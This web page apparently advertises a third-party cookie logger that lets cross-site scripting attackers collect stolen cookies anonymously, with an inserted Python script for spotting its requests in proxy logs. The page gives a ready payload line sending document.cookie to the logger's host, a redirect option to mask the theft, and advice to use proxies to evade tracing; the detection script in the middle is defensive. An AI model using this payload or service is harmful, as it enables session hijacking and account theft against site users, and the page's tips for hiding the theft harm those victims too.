
Home

Imagine you're at the stage where you've read through 1000 lines of code to see how a forum parses certain input. You've finally found an attack vector, tested it on your localhost and everything is good to go. You can successfully steal cookies. You're about to implement this on your vulnerable site when you realise that to steal cookies you need to include your site's URL in the attack. This means it can be traced to your domain, and from there a WHOIS directs people to you. You can't obfuscate your URL because it has to be a reversible process, and the admin is clever. What do you do? You need a 3rd party that can log the cookies and still let only you read them.

This is where I come in. This project will let you set up an account and direct the cookies directly into that account. That's it, you can now anonymously steal cookies.

Help, how does this work?

I'm not here to tell you about how a cookie stealer works, but I will tell you how to direct your cookies into your account. Let's say your account ID is 123456 (it's always six digits). You then need to have that as the very first thing in the query string. The following code for instance will work:
location.href = "http://ccl.whiteacid.org/log.php?123456"+document.cookie
Things to note are log.php, which is what logs things, and ?123456, which means the data will go into the account with ID=123456. Whatever you want to log follows directly after (with no delimiter).

The other thing you need to know is that the server will automatically clear any logged data older than 7 days and any account not used in 2 months. An account is used when it's logged into, not when data is sent to it.

As of version 1.1.3 an optional parameter can be passed in the query string. You can pass ccl_redirect in the query string and set it equal to a URL. The URL should be a full URL (minus the starting http:// bit). This is the URL the script will forward the user to once the logging has been done.
If not specified it'll default to /transp.gif, which is a 1x1 transparent .gif image.
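
Because the request format described above is fixed (log.php, a six-digit ID as the first thing in the query string, the logged data directly after it), it can be matched in web proxy or egress logs. The following Python is an added example, not part of this project's code; the log lines are constructed, and it assumes ccl_redirect is appended as an ordinary &name=value pair.

```python
import re
from urllib.parse import urlsplit, unquote

# Six-digit account ID as the very first thing in the query string,
# followed directly (no delimiter) by the logged data, as the page describes.
QUERY_RE = re.compile(r"^(?P<account>\d{6})(?P<data>.*)$", re.S)
# Assumption: ccl_redirect is appended as an ordinary &name=value parameter.
REDIRECT_RE = re.compile(r"(?:^|&)ccl_redirect=(?P<url>[^&]*)")
# Cookie-like content: at least one name=value pair in the logged data.
COOKIE_PAIR_RE = re.compile(r"[^=;&\s]+=[^;&]*")

# Constructed proxy log lines: "<client ip> <requested url>".
SAMPLE_LOG = """\
10.0.0.5 http://ccl.whiteacid.org/log.php?123456PHPSESSID=ab12cd;%20user=alice
10.0.0.7 http://ccl.whiteacid.org/log.php?654321sid=9f&ccl_redirect=forum.example/index.php
10.0.0.9 http://intranet.example/log.php?page=2
10.0.0.9 http://cdn.example/transp.gif
"""

def parse_logger_request(url):
    """Return the fields of a request in the logger format, else None."""
    parts = urlsplit(url)
    m = QUERY_RE.match(parts.query)
    if not parts.path.endswith("/log.php") or not m:
        return None
    data, redirect = m.group("data"), None
    r = REDIRECT_RE.search(data)
    if r:  # split the optional redirect target off the logged data
        redirect = unquote(r.group("url"))
        data = data[:r.start()] + data[r.end():]
    data = unquote(data)
    return {"host": parts.hostname, "account": m.group("account"),
            "data": data, "redirect": redirect,
            "cookie_like": bool(COOKIE_PAIR_RE.search(data))}

def scan(log_text):
    """Return (client, account, data, redirect) for each cookie-like hit."""
    hits = []
    for line in log_text.splitlines():
        client, _, url = line.partition(" ")
        rec = parse_logger_request(url)
        if rec and rec["cookie_like"]:
            hits.append((client, rec["account"], rec["data"], rec["redirect"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Session cookies set with the HttpOnly attribute are not exposed through document.cookie, so a request of this shape would not carry them.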

Are there any precautions I should take myself?

The ethics of a project like this are obviously dubious, though funnily enough at the time of writing I have only used this system to test it, not for any nefarious purposes. It should be known that my site is hosted by dreamhost.com; while they are a great host, it means I have no control over my logs. If a government body wants access to my logs and has the legal rights, there is nothing I can do; I may not even be notified. For this reason you should use some sort of proxy when setting up an account or using it.

Where's the source code?

Right here.

Where can I find out about changes made, suggest improvements etc?

Right here